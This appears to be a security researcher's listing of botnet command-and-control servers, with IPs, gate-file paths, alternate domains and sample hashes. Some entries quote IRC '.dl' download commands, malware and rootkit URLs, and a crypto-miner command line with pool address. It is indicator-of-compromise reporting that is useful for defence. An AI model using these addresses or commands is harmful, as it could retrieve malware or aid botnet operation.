Resolved sinsec.net to 37.221.170.96 Server: sinsec.net Gate file: /turndown/order.php Alternate domains: divinestresser.info radicalpkz.com perp.pw thefox.pw uploadme.pw perp.se Domain info: sinsec.net Domain Name: SINSEC.NET Registry Domain ID: 1814650535_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.enom.com Registrar URL: www.enom.com Updated Date: 2013-07-12 10:27:24Z Creation Date: 2013-07-12 17:27:00Z Registrar Registration Expiration Date: 2014-07-12 17:27:00Z Registrar: ENOM, INC. Registrar IANA ID: 48Read more...
dayzstreaming.co.uk (Betabot http botnet hosted by alibabahost.com)
Resolved dayzstreaming.co.uk to 37.221.170.194 Server: dayzstreaming.co.uk Gate file: /gato/order.php Alternate domain: dayzstreaming.org.uk Hosting info: http://whois.domaintools.com/37.221.170.194 Related md5s (Download sample from Malwr.com) Betabot: c0d2e08c3f0d964858b8a9788aa6732e
haveityourway.pw (betabot http botnet hosted by Alibabahost.com)
Resolved haveityourway.pw to 103.31.187.77 Server: haveityourway.pw Gate file: /members/order.php Alternate domains (currently not registered): thebestway42.pwitsoktohaveityourway.comlosmejoresburgers1.com The first domain was only registered yesterday. Hosting infos: http://whois.domaintools.com/103.31.187.77 Related md5s (Search on Malwr.com to download samples) Betabot: 3b0907c7bf881f8f5f9fa2190384d3dd
kankarmz.ru (betabot http botnet hosted by Alibabahost.com)
Resolved kankarmz.ru to 37.221.170.35 Server: kankarmz.ru Gate file: /Duf67/H8938_827.php Alternate domains (both are currently unregistered): u023sjasj.netiodijsakj.net This is one of only three or so betabots that I have seen rename the gate file from order.php to something less obvious. I guess that might be a bit too advanced for the average HF skid. Hosting infos:Read more...
solutionswiki.com (Andromeda http botnet hosted by alibabahost.com)
Resolved solutionswiki.com to 109.163.233.107 Server: solutionswiki.com Gate file: /pages/image.php There is also a betabot hosted on the same domain. Mining infos: dasHosts.exe -a scrypt-jane -o http://37.221.170.226:8344 -O YFicRwX9HpMkVovPPWG3NAJ9Tpom3YeXqC:x Hosting infos: http://whois.domaintools.com/109.163.233.107
umadais.pw (Betabot http botnet hosted by alibabahost.com)
Resolved umadais.pw to 109.163.229.189 Server: umadais.pw Gate file: /a/order.php Alternate domains: yyaammppuu.pw blamaldo.pw Hosting infos: http://whois.domaintools.com/109.163.229.189
solutionswiki.com (Betabot http botnet hosted by alibabahost.com)
Resolved solutionswiki.com to 109.163.233.107 Server: solutionswiki.com Port: 4137 Gate file: /system/order.php I don’t know why betabot owners keep putting their http servers on ports other than 80. Seems pretty dumb. I guess you can only expect so much from a HF bot and it’s owners. Hosting infos: http://whois.domaintools.com/109.163.233.107
x01bkr2.biz (snk asper mod irc botnet hosted by buyurl.net, alibabahost.com)
Resolved x01bkr2.biz to 94.242.237.128, 37.221.170.208 Server: x01bkr2.biz Port: 4723 Channel: #o.O Topic for #o.O is: .dl hxxp://www.mediafire.com/download.php?dqr1p0wz8tpz9tz | .dl hxxp://www.mediafire.com/download.php?uqqhg3equchc7bd Topic for #o.O set by SpliT at Sat Apr 27 17:57:29 2013 The skype spreader downloads messages from hxxp://waxortraxe.org/icon.jpg Alternate domains: zr0x1b9.biz xkzykxb.biz xeyaz.biz Hosting infos: http://whois.domaintools.com/94.242.237.128 Hosting infos: http://whois.domaintools.com/37.221.170.208 EDIT: snk is now desperatelyRead more...
firecrypt.net (Betabot http botnet hosted by alibabahost.com)
Resolved firecrypt.net to 37.221.165.124 Server: firecrypt.net Gate file: /BetaBot/order.php Alternate domains: rankedgaming.co iphone-giveaways.com Hosting infos: http://whois.domaintools.com/37.221.165.124
kryptic.me (Andromeda http botnet hosted by alibabahost.com)
Resolved kryptic.me to 37.221.170.234 Server: kryptic.me Gate file: /jackson/gate.php Plugins Rootkit: hxxp://krytical.me/jackson/plugins/rk_666604bd.mod Alternate domain: krytical.me http://whois.domaintools.com/37.221.170.234